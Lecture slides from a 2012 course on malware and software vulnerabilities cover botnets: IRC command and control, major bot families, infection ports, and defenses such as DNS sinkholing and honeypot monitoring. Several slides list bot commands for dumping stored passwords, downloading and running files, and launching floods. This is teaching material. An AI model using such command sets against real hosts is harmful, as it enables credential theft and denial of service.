CAP6135: Malware and Software Vulnerability Analysis

BotnetsCliff Zou

Spring 2012

2

Acknowledgement This lecture uses some contents from the lecture

notes from: Dr. Dawn Song: CS161: computer security Richard Wang – SophosLabs: The Development of

Botnets Randy Marchany - VA Tech IT Security Lab: Botnets

3

Botnets Collection of compromised hosts

Spread like worms and viruses Once installed, respond to remote commands

A network of ‘bots’ robot :

an automatic machine that can be programmed to perform specific tasks.

Also known as ‘zombies’

4

Platform for many attacks Spam forwarding (70% of all spam?) Click fraud Keystroke logging Distributed denial of service attacks

Serious problem Top concern of banks, online merchants Vint Cerf: ¼ of hosts connected to Internet

5

What are botnets used for?

6

IRC (Internet Relay Chat) based Control

7

IRC (Internet Relay Chat) based Control

8

Why IRC? IRC servers are:

freely available easy to manage easy to subvert

Attackers have experience with IRC IRC bots usually have a way to

remotely upgrade victims with new payloads to stay ahead of security efforts

9

How bad is the problem? Symantec identified a 400K node

botnet Netadmin in the Netherlands

discovered 1-2M unique IPs associated with Phatbot infections. Phatbot harvests MyDoom and Bagel

infected machines. Researchers in Gtech monitored

thousands of botnets

10

Spreading Problem Spreading mechanism is a leading

cause of background noise Port 445, 135, 139, 137 accounted for

80% of traffic captured by German Honeynet Project

Other ports 2745 – bagle backdoor 3127 – MyDoom backdoor 3410 – Optix trojan backdoor 5000 – upnp vulnerability

Most commonly used Bot familiesAgobotSDBotSpyBotGT Bot

Agobot

Most sophisticated 20,000 lines C/C++ code IRC based command/control Large collection of target exploits Capable of many DoS attack types Shell encoding/polymorphic obfuscation Traffic sniffers/key logging Defend/fortify compromised system Ability to frustrate dissassembly

SDBot Simpler than Agobot, 2,000 lines C code Non-malicious at base Utilize IRC-based command/control Easily extended for malicious purposes

Scanning DoS Attacks Sniffers Information harvesting Encryption

SpyBot <3,000 lines C code Possibly evolved from SDBot

Similar command/control engine No attempts to hide malicious purposes

GT Bot Functions based on mIRC scripting

capabilities HideWindow program hides bot on

local system Basic rootkit function

Port scanning, DoS attacks, exploits for RPC and NetBIOS

Variance in codebase size, structure, complexity, implementation

Convergence in set of functions Possibility for defense systems effective across

bot families Bot families extensible Agobot likely to become dominant

All of the above use IRC for command/control

Disrupt IRC, disable bots Sniff IRC traffic for commands Shutdown channels used for Botnets

IRC operators play central role in stopping botnet traffic

But a botnet could use its own IRC server Automated traffic identification required Future botnets may move away from IRC

Move to P2P communication Traffic fingerprinting still useful for

identification

Control

Host control Fortify system against other malicious

attacks Disable anti-virus software Harvest sensitive information

PayPal, software keys, etc. Economic incentives for botnets

Stresses need to patch/protect systems prior to attack

Stronger protection boundaries required across applications in OSes

19

Example Botnet Commands Connection

CLIENT: PASS <password> HOST : (if error, disconnect) CLIENT: NICK <nick> HOST : NICKERROR | CONNECTED

Pass hierarchy info BOTINFO <nick> <connected_to>

<priority> BOTQUIT <nick>

20

Example Botnet Commands IRC Commands

CHANJOIN <tag> <channel> CHANPART <tag> <channel> CHANOP <tag> <channel> CHANKICK <tag> <channel> CHANBANNED <tag> <channel> CHANPRIORITY <ircnet> <channel>

<LOW/NORMAL/HIGH>

21

Example Botnet Commands pstore

Display all usernames/passwords stored in browsers of infected systems

bot.execute Run executable on remote system

bot.open Reads file on remote computer

bot.command Runs command with system()

22

Example Botnet Commands http.execute

Download and execute file through http ftp.execute

ddos.udpflood ddos.synflod ddos.phaticmp redirect.http redirect.socks

23

Current Botnet Control Architecture

bot bot

C&C

botmaster

bot

C&C

•More than one C&C server•Spread all around the world

24

Botnet Monitor: Gatech KarstNet A lot bots use Dyn-DNS

name to find C&C

bot

bot

C&C

attacker

C&C

KarstNet sinkhole

cc1.com KarstNet informs DNS

provider of cc1.com Detect cc1.com by its abnormal

DNS queries

DNS provider maps cc1.com to Gatech sinkhole (DNS hijack)

bot

All/most bots attempt to connect the sinkhole

Botnet Monitor: Honeypot Spy Security researchers set up honeypots

Honeypots: deliberately set up vulnerable machines When compromised, put close monitoring of malware’s behaviors Tutorial: http://en.wikipedia.org/wiki/Honeypot_%28computing

%29 When compromised honeypot joins a botnet

Passive monitoring: log all network traffic Active monitoring: actively contact other bots to obtain more

information (neighborhood list, additional c&c, etc.) Representative research paper:

A multifaceted approach to understanding the botnet phenomenon, Abu Rajab, Moheeb and Zarfoss, Jay and Monrose, Fabian and Terzis, Andreas, 6th ACM SIGCOMM conference on Internet measurement (IMC), 2006.

25

26

The Future Generation of Botnets Peer-to-Peer C&C

Polymorphism

Anti-honeypot

Rootkit techniques